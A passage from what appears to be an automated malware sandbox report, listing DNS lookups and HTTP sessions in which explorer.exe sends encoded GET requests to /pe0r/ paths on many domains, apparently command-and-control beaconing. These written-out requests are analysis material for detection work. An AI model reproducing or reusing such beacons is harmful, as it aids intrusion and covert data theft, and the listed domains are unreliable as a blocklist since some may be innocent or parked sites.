                                                                      Apr 8, 2021 13:22:12.456660032 CEST192.168.2.48.8.8.80x1d91Standard query (0)www.essentials-trading.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:17.520349979 CEST192.168.2.48.8.8.80x8094Standard query (0)www.luegomusic.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:23.405999899 CEST192.168.2.48.8.8.80xa149Standard query (0)www.kf350.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:29.411036968 CEST192.168.2.48.8.8.80xdeb5Standard query (0)www.hzmsbg.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:34.461175919 CEST192.168.2.48.8.8.80x1013Standard query (0)www.quickeasybites.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:44.664508104 CEST192.168.2.48.8.8.80x1d30Standard query (0)www.pierresplayhouse.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.023492098 CEST192.168.2.48.8.8.80x79eeStandard query (0)www.thecapitalhut.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:55.178546906 CEST192.168.2.48.8.8.80xfb00Standard query (0)www.ssfgasia.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:00.396368027 CEST192.168.2.48.8.8.80xa297Standard query (0)www.desertfoxindustries.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:06.480061054 CEST192.168.2.48.8.8.80x7cc0Standard query (0)www.tennesseewheelrepair.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.916363001 CEST192.168.2.48.8.8.80xd53Standard query (0)www.rootedwithlovejax.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:17.182508945 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:18.192764997 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:19.208389044 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:21.224176884 CEST192.168.2.48.8.8.80xefccStandard query (0)www.coloradocouponclub.comA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:27.210115910 CEST192.168.2.48.8.8.80xa670Standard query (0)www.lideresdeimmunocal.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Apr 8, 2021 13:22:07.200592995 CEST8.8.8.8192.168.2.40xd067No error (0)www.1364kensington.com66.96.161.160A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:12.511807919 CEST8.8.8.8192.168.2.40x1d91Name error (3)www.essentials-trading.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:17.701608896 CEST8.8.8.8192.168.2.40x8094No error (0)www.luegomusic.comluegomusic.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:17.701608896 CEST8.8.8.8192.168.2.40x8094No error (0)luegomusic.com162.241.244.61A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:23.711600065 CEST8.8.8.8192.168.2.40xa149No error (0)www.kf350.com107.178.142.156A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:29.453022957 CEST8.8.8.8192.168.2.40xdeb5Name error (3)www.hzmsbg.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:34.608465910 CEST8.8.8.8192.168.2.40x1013Name error (3)www.quickeasybites.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:44.780318975 CEST8.8.8.8192.168.2.40x1d30No error (0)www.pierresplayhouse.com199.59.242.153A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)www.thecapitalhut.comwww11.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)www11.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:50.072901964 CEST8.8.8.8192.168.2.40x79eeNo error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:22:55.218827963 CEST8.8.8.8192.168.2.40xfb00No error (0)www.ssfgasia.comssfgasia.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:22:55.218827963 CEST8.8.8.8192.168.2.40xfb00No error (0)ssfgasia.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:00.417926073 CEST8.8.8.8192.168.2.40xa297No error (0)www.desertfoxindustries.comdesertfoxindustries.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:23:00.417926073 CEST8.8.8.8192.168.2.40xa297No error (0)desertfoxindustries.com184.168.131.241A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:06.521147013 CEST8.8.8.8192.168.2.40x7cc0No error (0)www.tennesseewheelrepair.comtennesseewheelrepair.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:23:06.521147013 CEST8.8.8.8192.168.2.40x7cc0No error (0)tennesseewheelrepair.com184.168.131.241A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.36.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.32.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.34.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.38.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:22.195578098 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:23.204312086 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:24.221883059 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:26.237104893 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:27.627649069 CEST8.8.8.8192.168.2.40xa670Server failure (2)www.lideresdeimmunocal.comnonenoneA (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.1364kensington.com
                                                                      • www.luegomusic.com
                                                                      • www.kf350.com
                                                                      • www.pierresplayhouse.com
                                                                      • www.thecapitalhut.com
                                                                      • www.ssfgasia.com
                                                                      • www.desertfoxindustries.com
                                                                      • www.tennesseewheelrepair.com
                                                                      • www.rootedwithlovejax.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.44975166.96.161.16080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:07.319251060 CEST1216OUTGET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.1364kensington.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:07.443166971 CEST1217INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 08 Apr 2021 11:22:07 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449764162.241.244.6180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:17.851991892 CEST2104OUTGET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.luegomusic.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:18.669209003 CEST2105INHTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:17 GMT
                                                                      Server: Apache
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Location: http://luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0
                                                                      host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                      X-Endurance-Cache-Level: 0
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.449770107.178.142.15680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:23.881720066 CEST2159OUTGET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.kf350.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:27.418097019 CEST6582INHTTP/1.1 200 OK
                                                                      Date: Thu, 08 Apr 2021 11:22:35 GMT
                                                                      Content-Length: 331
                                                                      Content-Type: text/html
                                                                      Server: Microsoft-IIS/7.5
                                                                      Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b9 d9 cd f8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.449771199.59.242.15380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:44.892147064 CEST6584OUTGET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.pierresplayhouse.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:45.002899885 CEST6585INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ==
                                                                      Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 76 46 4f 2b 51 61 30 52 30 6d 6f 77 4a 61 73 4c 51 54 53 6e 52 76 57 61 47 55 69 43 38 54 67 52 52 35 62 74 38 56 30 33 74 6c 41 31 6f 30 55 76 2f 5a 6e 76 77 4b 37 31 47 78 39 39 69 52 44 7a 33 6a 45 65 77 63 47 45 48 51 51 74 4a 43 41 4a 61 68 4d 66 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                      Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.44977235.246.6.10980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:50.107975006 CEST6590OUTGET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.thecapitalhut.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:50.173912048 CEST6591INHTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:50 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      location: https://www.thecapitalhut.com/pe0r?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0
                                                                      strict-transport-security: max-age=120
                                                                      x-wix-request-id: 1617880970.125913965966121268
                                                                      Age: 0
                                                                      Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                      X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgmNySqidgeEPHXBvm3U9iS,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRalh3hwieZdjPl8CZNSQhfEynGR4aF8yrGttME1Z/doJQd3fKEXQvQlSAkB/lstal9R73i9xLAFDBM1sgnz44DHz8=,2UNV7KOq4oGjA5+PKsX47NdwL56oCSUGh+LISE2KX3A=,sqmudy1rWy5CXemzdhzS/IdY/BHPTlKnJIetyMef762TzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,k4IrXgMmYJ2VF1cp9wAw75WSI3OLjEFdjvyrPhumLIdLrTe66AYUmhbsk95nB1oVKjCWKapddFlOEEDxcGowaw==
                                                                      Cache-Control: no-cache
                                                                      Server: Pepyaka/1.19.0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.44977434.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:55.232578993 CEST6600OUTGET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.ssfgasia.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:55.347368956 CEST6601INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "6061898c-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449776184.168.131.24180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:23:00.599381924 CEST6612OUTGET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.desertfoxindustries.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:00.805794001 CEST6612INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
